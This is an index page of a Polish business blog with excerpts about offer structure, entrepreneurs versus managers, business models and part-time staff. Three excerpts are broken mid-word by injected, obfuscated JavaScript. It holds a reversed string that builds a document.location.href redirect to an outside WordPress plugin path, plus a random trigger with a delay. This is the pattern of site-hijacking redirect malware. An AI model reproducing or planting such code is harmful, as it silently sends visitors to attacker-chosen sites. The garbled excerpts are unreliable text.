Struktura oferty

Firmy starają się nadać swojej ofercie jakąś strukturę. Trochę dlatego, żeby ułatwić klien toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var [...]

Przedsiębiorca a menedżer

Każdy jest inny i w toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]

Wiele wersji Modelu Biznesowego

Funkcjonowanie firmy opisuje jej Model Biznesowy. W firmie handlowej war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var [...]

Na pół etatu

W firmie najważniejsi są pracownicy. A już szczególnie w takiej, która działa w systemie intensywnej obsługi. Warunkiem jest oczywiście aktywność i wiedza pracowników, ale milczącym założeniem [...]